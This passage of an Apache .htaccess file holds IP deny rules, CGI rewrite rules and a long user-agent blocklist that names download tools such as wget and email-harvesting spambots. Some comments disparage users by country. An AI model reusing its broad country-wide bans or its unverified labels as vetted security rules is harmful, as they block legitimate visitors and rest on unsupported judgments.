deny from 38.144.36.11        # allresearch.com
deny from 38.144.36.12
deny from 38.144.36.13
deny from 38.144.36.14
deny from 38.144.36.15
deny from 38.144.36.16
deny from 38.144.36.17
deny from 206.28.72.          # gettyimages.com bandwidth waster
deny from 206.28.73.
deny from 206.28.74.
deny from 206.28.75.
deny from 206.28.76.
deny from 206.28.77.
deny from 206.28.78.
deny from 206.28.79.
deny from 209.73.228.160      # allresearch.com
deny from 209.73.228.161
deny from 209.73.228.162
deny from 209.73.228.163
deny from 209.73.228.164
deny from 209.73.228.165
deny from 209.73.228.166
deny from 209.73.228.167
deny from 209.73.228.168
deny from 209.73.228.169
deny from 209.73.228.170
deny from 209.73.228.171
deny from 209.73.228.172
deny from 209.73.228.173
deny from 209.73.228.174
deny from 209.73.228.175
deny from 158.108.            # thailand university
deny from 168.187.            # kuwait ministry of communications
deny from 168.188.            # korea university
deny from 66.207.120.221      # net-sweeper.com
deny from 66.207.120.222
deny from 66.207.120.223
deny from 66.207.120.224
deny from 66.207.120.225
deny from 66.207.120.226
deny from 66.207.120.227
deny from 66.207.120.228
deny from 66.207.120.229
deny from 66.207.120.230
deny from 66.207.120.231
deny from 66.207.120.232
deny from 66.207.120.233
deny from 66.207.120.234
deny from 66.207.120.235
deny from 167.24.             # usaa.com and wastemylife.com p3p client
deny from 192.118.48.247      # icomverse.com (Israel, hacker heaven)
deny from 192.118.48.248
deny from 192.118.48.249
deny from 67.209.128.         # clown from TX, wastes bandwidth, abusive feedback
deny from 12.148.209.         # NameProtect.com bandwidth waster
deny from 12.148.196.         # NameProtect.com bandwidth waster
deny from 212.19.205.         # clown from Netherlands impersonating Webcrawler!
deny from 206.190.171.172     # markwatch.com bandwidth waster (4 IPs)
deny from 206.190.171.173
deny from 206.190.171.174
deny from 206.190.171.175
deny from 211.157.
deny from 211.74.
deny from 64.14.202.182
deny from 213.219.11.19
deny from 193.220.178.        # abusive crawler from Benin
deny from 24.77.178.1         # abusive OK cable user
deny from 68.65.53.71         # unknown user (java1.4.0_03) slowly crawling whole site!
deny from 198.26.120.13       # unknown .MIL user (keeps hitting one page over and over!)
deny from 63.148.99.          # Cyveillance.com bandwidth waster
deny from 65.118.41.          # Cyveillance.com bandwidth waster
deny from 192.116.85.         # abusive crawler, no ref, no ua, Israel?
deny from 62.119.21.          # sweden including picsearch.com bot
deny from 80.179.100.         # Israeli bot
deny from 80.248.64.50        # guestbook spambot
deny from 64.106.213.         # some clown in Jersey, Russian name, hammering links page
deny from 62.220.103.         # Iran
allow from all
</Limit>

RewriteEngine On
RewriteRule ^addreciprocallink.shtml$  cgi-bin/rl.pl?m=add      [T=application/x-httpd-cgi]
RewriteRule ^reciprocallinkspage.shtml$  cgi-bin/rl.pl?cat=General  [T=application/x-httpd-cgi]
RewriteRule ^pp-(.*).shtml$  /cgi-bin/ps.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^ppdvds-(.*).shtml$  /cgi-bin/psdvds.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^ppvideos-(.*).shtml$  /cgi-bin/psvideos.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^ppbooks-(.*).shtml$  /cgi-bin/psbooks.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^ppmusic-(.*).shtml$  /cgi-bin/psmusic.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^ap-fl-(.*).shtml$  /cgi-bin/a-fl.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^ap-mt-(.*).shtml$  /cgi-bin/a-mt.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^ap-wf-(.*).shtml$  /cgi-bin/a-wf.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^ap-h-(.*).shtml$  /cgi-bin/a-h.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^ap-rm-(.*).shtml$  /cgi-bin/a-rm.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^ap-sf-(.*).shtml$  /cgi-bin/a-sf.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^ap-g-(.*).shtml$  /cgi-bin/a-g.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^freesoftwaretitle-(.*).shtml$  /cgi-bin/freesoft.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^freesoftwaretitle-(.*)-(.*).shtml$  /cgi-bin/freesoft.pl?$1-$2  [T=application/x-httpd-cgi]
RewriteRule ^asseenontvitem-(.*).shtml$  /cgi-bin/asseen.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^asseenontvitem-(.*)-(.*).shtml$  /cgi-bin/asseen.pl?$1-$2  [T=application/x-httpd-cgi]
RewriteRule ^fordogsitem-(.*).shtml$  /cgi-bin/fordogs.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^fordogsitem-(.*)-(.*).shtml$  /cgi-bin/fordogs.pl?$1-$2  [T=application/x-httpd-cgi]
RewriteRule ^jewelryitem-(.*).shtml$  /cgi-bin/jewelry.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^jewelryitem-(.*)-(.*).shtml$  /cgi-bin/jewelry.pl?$1-$2  [T=application/x-httpd-cgi]
RewriteRule ^scooteritem-(.*).shtml$  /cgi-bin/scooters.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^redfoxjavaitem-(.*).shtml$  /cgi-bin/redfox.pl?$1  [T=application/x-httpd-cgi]
RewriteRule ^ymc-(.*)-(.*).shtml$  /cgi-bin/ymcdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^mbc-(.*)-(.*).shtml$  /cgi-bin/mbcdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^tbt-(.*)-(.*).shtml$  /cgi-bin/tbtdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^tss-(.*)-(.*).shtml$  /cgi-bin/tssdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^tls-(.*)-(.*).shtml$  /cgi-bin/tlsdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^tps-(.*)-(.*).shtml$  /cgi-bin/tpsdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^wotwdet-(.*)-(.*).shtml$  /cgi-bin/wotwdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^tsaks-(.*)-(.*).shtml$  /cgi-bin/tsaks.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^tigs-(.*)-(.*).shtml$  /cgi-bin/tigs.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^freesoftcd_(.*)_(.*).shtml$  /cgi-bin/freesft.pl?$1_$2  [T=application/x-httpd-cgi]
RewriteRule ^vcdet-(.*)-(.*).shtml$  /cgi-bin/vcdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^fab-(.*)-(.*).shtml$  /cgi-bin/fabdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^tbp-(.*)-(.*).shtml$  /cgi-bin/tbpdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^cifri-(.*)-(.*).shtml$  /cgi-bin/cifri.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^cifdt-(.*)-(.*).shtml$  /cgi-bin/cifdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^tcpdcf-(.*)-(.*).shtml$  /cgi-bin/tcpdcf.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^tpc-(.*)-(.*).shtml$  /cgi-bin/tpcdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^tbcdet-(.*)-(.*).shtml$  /cgi-bin/tbcdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^gjag-(.*)-(.*).shtml$  /cgi-bin/gjag.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^wkdet-(.*)-(.*).shtml$  /cgi-bin/wk.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^ebunvdet-(.*)-(.*).shtml$  /cgi-bin/ebunvdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^fsai-(.*)-(.*).shtml$  /cgi-bin/fsai.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^fdr-(.*)-(.*).shtml$  /cgi-bin/fdr.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^tes-(.*)-(.*).shtml$  /cgi-bin/tesdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^btah-(.*)-(.*).shtml$  /cgi-bin/btahdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^sms-(.*)-(.*).shtml$  /cgi-bin/tsmsdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^cfkdet-(.*)-(.*).shtml$  /cgi-bin/cfk.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^sfhdet-(.*)-(.*).shtml$  /cgi-bin/sfh.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^bfldetail-(.*)-(.*).shtml$  /cgi-bin/bfldpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^tbh-(.*)-(.*).shtml$  /cgi-bin/tbhdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^wgb-(.*)-(.*).shtml$  /cgi-bin/wgbdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^bhg-(.*)-(.*).shtml$  /cgi-bin/bhgdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^egdet-(.*)-(.*).shtml$  /cgi-bin/begdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^tgddet-(.*)-(.*).shtml$  /cgi-bin/tgddpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^wdd-(.*)-(.*).shtml$  /cgi-bin/wddamaz.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^wddart-(.*)-(.*).shtml$  /cgi-bin/wddarticle.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^blginfo-(.*)-(.*).shtml$  /cgi-bin/blgdpg.pl?$1-$2 [T=application/x-httpd-cgi]
RewriteRule ^afwinfo-(.*)-(.*).shtml$  /cgi-bin/afwdpg.pl?$1-$2 [T=application/x-httpd-cgi]

RewriteCond %{HTTP_USER_AGENT} ^-?$ [NC,OR] # blank user-agent
RewriteCond %{HTTP_USER_AGENT} "addresses\.com" [NC,OR] # spambot
RewriteCond %{HTTP_USER_AGENT} "agnitum" [NC,OR] # firewall sw from Cyprus
RewriteCond %{HTTP_USER_AGENT} aipbot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alkaline [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "almaden" [NC,OR] # IBM unknown crawler
RewriteCond %{HTTP_USER_AGENT} amfibi [NC,OR] # spanish SE
RewriteCond %{HTTP_USER_AGENT} "anarchie" [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} anonymous [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "applewebkit" [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} "art-online" [NC,OR] # France SE
RewriteCond %{HTTP_USER_AGENT} arikus [NC,OR] # voxel.net webhost
RewriteCond %{HTTP_USER_AGENT} "aspseek" [NC,OR] # unknown agent
RewriteCond %{HTTP_USER_AGENT} baidu [NC,OR] # chinese language SE
RewriteCond %{HTTP_USER_AGENT} "blackbox" [NC,OR] # HTML to JPG converter
RewriteCond %{HTTP_USER_AGENT} "bordermanager" [NC,OR] # Novell network controller iow workers goofing off
RewriteCond %{HTTP_USER_AGENT} botswana [NC,OR] # Unknown Agent
RewriteCond %{HTTP_USER_AGENT} "bravobrian" [NC,OR] # unknown agent
RewriteCond %{HTTP_USER_AGENT} bruinbot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} btbot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "caddbot" [NC,OR] # classified ad bot
RewriteCond %{HTTP_USER_AGENT} ccubee [NC,OR] # czech crawler
RewriteCond %{HTTP_USER_AGENT} cfetch [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cfnetwork [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cherry.?picker [NC,OR] # spambot
RewriteCond %{HTTP_USER_AGENT} cjnetworkquality [NC,OR] # cj.com bot
RewriteCond %{HTTP_USER_AGENT} claria [NC,OR] # gator.com
RewriteCond %{HTTP_USER_AGENT} combine [NC,OR] # swedish harvester
RewriteCond %{HTTP_USER_AGENT} contactbot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} convera [NC,OR] # convera.com
RewriteCond %{HTTP_USER_AGENT} ConveraCrawler [NC,OR] # convera.com
RewriteCond %{HTTP_USER_AGENT} cosmos [NC,OR] # xyleme.com bot
RewriteCond %{HTTP_USER_AGENT} cowbot [NC,OR] # korean naver bot
RewriteCond %{HTTP_USER_AGENT} cuill [NC,OR] # www.cuill.com
RewriteCond %{HTTP_USER_AGENT} crescent [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} dattatec [NC,OR] # argentina bot
RewriteCond %{HTTP_USER_AGENT} deepak [NC,OR] # research bot from California
RewriteCond %{HTTP_USER_AGENT} dloader [NC,OR] # unknown downloader
RewriteCond %{HTTP_USER_AGENT} "^DA \d\.\d " [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} "DTS Agent" [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} "^download" [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} diamond [NC,OR] # gator.com
RewriteCond %{HTTP_USER_AGENT} dtaagent [NC,OR] # bot grabs too fast
RewriteCond %{HTTP_USER_AGENT} dumbot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} easydl [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} e?mail.?(collector|magnet|reaper|siphon|sweeper|harvest|collect|wolf) [NC,OR] # spambots
RewriteCond %{HTTP_USER_AGENT} "Educate Search" [NC,OR] # guestbook spambot
RewriteCond %{HTTP_USER_AGENT} ejupiter [NC,OR] # pathetic SE
RewriteCond %{HTTP_USER_AGENT} entrieva [NC,OR]
RewriteCond %{HTTP_USER_AGENT} exava.com [NC,OR]
RewriteCond %{HTTP_USER_AGENT} experimental [NC,OR]
RewriteCond %{HTTP_USER_AGENT} expired [NC,OR]
RewriteCond %{HTTP_USER_AGENT} express [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} extractor [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} faxobot [NC,OR] # faxo.com
RewriteCond %{HTTP_USER_AGENT} "Fetch API Request" [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} "fast firstpage retriever" [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} "fetchbook\.info" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} findexa [NC,OR] # norway SE
RewriteCond %{HTTP_USER_AGENT} findlinks [NC,OR] # german experimental bot
RewriteCond %{HTTP_USER_AGENT} findwhat [NC,OR]
RewriteCond %{HTTP_USER_AGENT} flashget [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} FlickBot [NC,OR] # rude bot
RewriteCond %{HTTP_USER_AGENT} "Franklin Locator" [NC,OR] # guestbook spambot
RewriteCond %{HTTP_USER_AGENT} gais [NC,OR] # Chinese SE
RewriteCond %{HTTP_USER_AGENT} gazz/ [NC,OR] # Japanese language bot
RewriteCond %{HTTP_USER_AGENT} geobot [NC,OR] # spain bot
RewriteCond %{HTTP_USER_AGENT} gethtmlcontent [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} getright [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} girafabot [NC,OR] # girafa.com SE thingy
RewriteCond %{HTTP_USER_AGENT} giveramp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} go.?zilla [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} gonzo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} grabber [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} "green research" [NC,OR] # unknown bot
RewriteCond %{HTTP_USER_AGENT} "green research, inc." [NC,OR] # unknown bot
RewriteCond %{HTTP_USER_AGENT} gulper [NC,OR]
RewriteCond %{HTTP_USER_AGENT} harvest [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hloader [NC,OR] # unknown downloader
RewriteCond %{HTTP_USER_AGENT} hoowwwer [NC,OR] # finnish SE
RewriteCond %{HTTP_USER_AGENT} html2jpg [NC,OR] # HTML to JPG converter
RewriteCond %{HTTP_USER_AGENT} htmlparser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "http generic" [NC,OR] # Unknown agent
RewriteCond %{HTTP_USER_AGENT} httpclient [NC,OR] # OD Webdown
RewriteCond %{HTTP_USER_AGENT} httprequest [NC,OR]
RewriteCond %{HTTP_USER_AGENT} httrack [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} ia_archiver [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ichiro [NC,OR] # Japanese language bot (see gazz)
RewriteCond %{HTTP_USER_AGENT} "ie plagin" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "ie plugin" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} imagefetch [NC,OR] # rude bot
RewriteCond %{HTTP_USER_AGENT} "Indy Library" [NC,OR] # spambot
RewriteCond %{HTTP_USER_AGENT} "Industry Program" [NC,OR] # guestbook spambot
RewriteCond %{HTTP_USER_AGENT} "^internet explorer$" [NC,OR] # BS agent
RewriteCond %{HTTP_USER_AGENT} ineturl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} innerprise [NC,OR] # innerprise.net
RewriteCond %{HTTP_USER_AGENT} irlbot [NC,OR] # research bot
RewriteCond %{HTTP_USER_AGENT} ithenticate [NC,OR] # iThenticate spybot
RewriteCond %{HTTP_USER_AGENT} iupui [NC,OR] # Unknown research (spam?) bot
RewriteCond %{HTTP_USER_AGENT} java [NC,OR] # generic textbook bots
RewriteCond %{HTTP_USER_AGENT} jetbot [NC,OR] # Unknown private SE
RewriteCond %{HTTP_USER_AGENT} joedog [NC,OR]
RewriteCond %{HTTP_USER_AGENT} k2spider [NC,OR] # unknown bot
RewriteCond %{HTTP_USER_AGENT} kuloko [NC,OR] # kuloko.com
RewriteCond %{HTTP_USER_AGENT} lanshan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lcabotaccept [NC,OR] # unknown bot
RewriteCond %{HTTP_USER_AGENT} larbin [NC,OR] # unknown (spambot)
RewriteCond %{HTTP_USER_AGENT} lapozz [NC,OR] # BS hungarian bot
RewriteCond %{HTTP_USER_AGENT} law-x [NC,OR] # scraper site bot
RewriteCond %{HTTP_USER_AGENT} linksmanager [NC,OR] # linksmanager.com spambot
RewriteCond %{HTTP_USER_AGENT} linkwalker [NC,OR] # spambot
RewriteCond %{HTTP_USER_AGENT} lmcrawler [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lmqueuebot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} loopimprovements [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "lwp\:\:simple" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "lwp-trivial" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "Mac Finder" [NC,OR] # guestbook spambot
RewriteCond %{HTTP_USER_AGENT} "Microsoft URL Control" [NC,OR] # spambot
RewriteCond %{HTTP_USER_AGENT} "mister pix" [NC,OR] # rude bot
RewriteCond %{HTTP_USER_AGENT} "missauga" [NC,OR] # guestbook spambot
RewriteCond %{HTTP_USER_AGENT} "missigua" [NC,OR] # guestbook spambot
RewriteCond %{HTTP_USER_AGENT} madlyrics [NC,OR] # Winamp downloader
RewriteCond %{HTTP_USER_AGENT} marvin [NC,OR] # danish/whoever bot
RewriteCond %{HTTP_USER_AGENT} microsoftprototypecrawler [NC,OR]
RewriteCond %{HTTP_USER_AGENT} minirank [NC,OR]
RewriteCond %{HTTP_USER_AGENT} miva [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mizzu [NC,OR] # Mizzu Labs bot
RewriteCond %{HTTP_USER_AGENT} mj12 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} majestic [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mogren [NC,OR] # russian bot
RewriteCond %{HTTP_USER_AGENT} "mozilla\(ie compatible\)" [NC,OR] # BS agent
RewriteCond %{HTTP_USER_AGENT} MSIECrawler [NC,OR] # IE's "make available offline" mode
RewriteCond %{HTTP_USER_AGENT} MSFrontPage [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} msrbot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} msproxy [NC,OR] # discontinued proxy software
RewriteCond %{HTTP_USER_AGENT} msx [NC,OR] # unknown agent
RewriteCond %{HTTP_USER_AGENT} mvaclient [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "my session" [NC,OR] # unknown agent
RewriteCond %{HTTP_USER_AGENT} "NASA Search" [NC,OR] # bogus clown on comcast 
RewriteCond %{HTTP_USER_AGENT} netresearchserver [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} netsprint [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} netwhat [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} nextgensearch [NC,OR] # BW waster 
RewriteCond %{HTTP_USER_AGENT} nusearch [NC,OR] # spider OD 
RewriteCond %{HTTP_USER_AGENT} nutch [NC,OR] # experimental bot 
RewriteCond %{HTTP_USER_AGENT} ocelli [NC,OR] # www.globalspec.com 
RewriteCond %{HTTP_USER_AGENT} offline [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} omniexplorer [NC,OR] # useless bot 
RewriteCond %{HTTP_USER_AGENT} "onsinn.de" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} outfoxbot [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} nameprotect [NC,OR] # NameProtect spybot 
RewriteCond %{HTTP_USER_AGENT} naver [NC,OR] # Korean robot 
RewriteCond %{HTTP_USER_AGENT} net.?(ants|mechanic|spider|vampire|zip) [NC,OR] # ODs 
RewriteCond %{HTTP_USER_AGENT} netcaptor [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} nicebot [NC,OR] # stealth bot 
RewriteCond %{HTTP_USER_AGENT} nicerspro [NC,OR] # spambot 
RewriteCond %{HTTP_USER_AGENT} ninja [NC,OR] # Download Ninja OD 
RewriteCond %{HTTP_USER_AGENT} nobody [NC,OR] # Unknown Agent 
RewriteCond %{HTTP_USER_AGENT} noxtrum [NC,OR] # spanish private server 
RewriteCond %{HTTP_USER_AGENT} NPBot [NC,OR] # NameProtect spybot 
RewriteCond %{HTTP_USER_AGENT} "\ obot" [NC,OR] # Unknown bot 
RewriteCond %{HTTP_USER_AGENT} "^obot$" [NC,OR] # Unknown bot 
RewriteCond %{HTTP_USER_AGENT} openfind [NC,OR] # taiwan bot 
RewriteCond %{HTTP_USER_AGENT} panopy [NC,OR] # unknown bot 
RewriteCond %{HTTP_USER_AGENT} patwebbot [NC,OR] # bs bot from germany 
RewriteCond %{HTTP_USER_AGENT} peerfactor [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} pipeline [NC,OR] # cable account based SE 
RewriteCond %{HTTP_USER_AGENT} plink [NC,OR] # stealth bot 
RewriteCond %{HTTP_USER_AGENT} "program shareware" [NC,OR] # guestbook spambot 
RewriteCond %{HTTP_USER_AGENT} plantynet [NC,OR] # Korean bot 
RewriteCond %{HTTP_USER_AGENT} "poe-component-client" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} "polybot" [NC,OR] # cis.poly.edu 
RewriteCond %{HTTP_USER_AGENT} psbot [NC,OR] # Picture Downloader 
RewriteCond %{HTTP_USER_AGENT} picsearch [NC,OR] # Picture Downloader 
RewriteCond %{HTTP_USER_AGENT} qarp [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} qcreep [NC,OR] # quepasa in disguise 
RewriteCond %{HTTP_USER_AGENT} quepasa [NC,OR] # SouthAmerican bot 
RewriteCond %{HTTP_USER_AGENT} "safari" [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} "^sew$" [NC,OR] # unknown agent 
RewriteCond %{HTTP_USER_AGENT} rampybot [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} research [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sbider [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} schibstedsok [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} "scientec.de" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} scspider [NC,OR] # SpamBot 
RewriteCond %{HTTP_USER_AGENT} scumbot [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} search-o-rama [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} searchsight [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} searchwarp [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} seekbot [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} seznambot [NC,OR] # czech bot 
RewriteCond %{HTTP_USER_AGENT} shim-crawler [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} siphon [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sitemapper [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sitesell [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} skywalker [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sleuth [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} SlySearch [NC,OR] # SlySearch spybot 
RewriteCond %{HTTP_USER_AGENT} snagger [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} societyrobot [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} "sohu agent" [NC,OR] # spambot 
RewriteCond %{HTTP_USER_AGENT} sohu-search [NC,OR] # spambot 
RewriteCond %{HTTP_USER_AGENT} sonicquest [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} spider_pro [NC,OR] # innerprise.net 
RewriteCond %{HTTP_USER_AGENT} spiderku [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} spiderman [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sproose [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sqworm [NC,OR] # unknown bot 
RewriteCond %{HTTP_USER_AGENT} stackrambler [NC,OR] # russian bot 
RewriteCond %{HTTP_USER_AGENT} steeler [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} SurveyBot [NC,OR] # rude bot 
RewriteCond %{HTTP_USER_AGENT} szukacz [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} tcf [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} tele(port|soft) [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} "test/0" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} "test1" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} "test 1" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} "test rig" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} "tsw bot" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} terrawiz [NC,OR] # India SE 
RewriteCond %{HTTP_USER_AGENT} trademark [NC,OR] # bandwidth waster trademarktracker.com 
RewriteCond %{HTTP_USER_AGENT} transgenikbot [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} Turnitin [NC,OR] # Turnitin spybot 
RewriteCond %{HTTP_USER_AGENT} twiceler [NC,OR] # www.cuill.com 
RewriteCond %{HTTP_USER_AGENT} twotrees [NC,OR] # willow internet crawler 
RewriteCond %{HTTP_USER_AGENT} "under the rainbow" [NC,OR] # unknown bot 
RewriteCond %{HTTP_USER_AGENT} "unknown origin" [NC,OR] # unknown bot 
RewriteCond %{HTTP_USER_AGENT} unchaos [NC,OR] # SE that spams web logs 
RewriteCond %{HTTP_USER_AGENT} url2file [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} usyd-nlp  [NC,OR] # research spider 
RewriteCond %{HTTP_USER_AGENT} "vb openurl" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} visvo [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} votay [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} voyager [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} w3crobot [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} w3mir [NC,OR] # site copier 
RewriteCond %{HTTP_USER_AGENT} wbdbot [NC,OR] #sky.siraza.net 
RewriteCond %{HTTP_USER_AGENT} weasel [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} weazel [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} web.?(auto|bandit|collector|copier|devil|downloader|fetch|hook|mole|miner|mirror|reaper|sauger|sucker|site|snake|stripper|weasel|zip) [NC,OR] # ODs 
RewriteCond %{HTTP_USER_AGENT} webclipping [NC,OR] # bandwidth waster webclipping.com 
RewriteCond %{HTTP_USER_AGENT} webbug [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} webcollage [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} webindexer [NC,OR] # development bot 
RewriteCond %{HTTP_USER_AGENT} webpix [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} webrace [NC,OR] # crawler 
RewriteCond %{HTTP_USER_AGENT} webspider [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} websquash [NC,OR] # SEO 
RewriteCond %{HTTP_USER_AGENT} "wells search" [NC,OR] # spambot 
RewriteCond %{HTTP_USER_AGENT} "wep search" [NC,OR] # spambot 
RewriteCond %{HTTP_USER_AGENT} wget [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} wise-guys.nl [NC,OR] # Clown in NL 
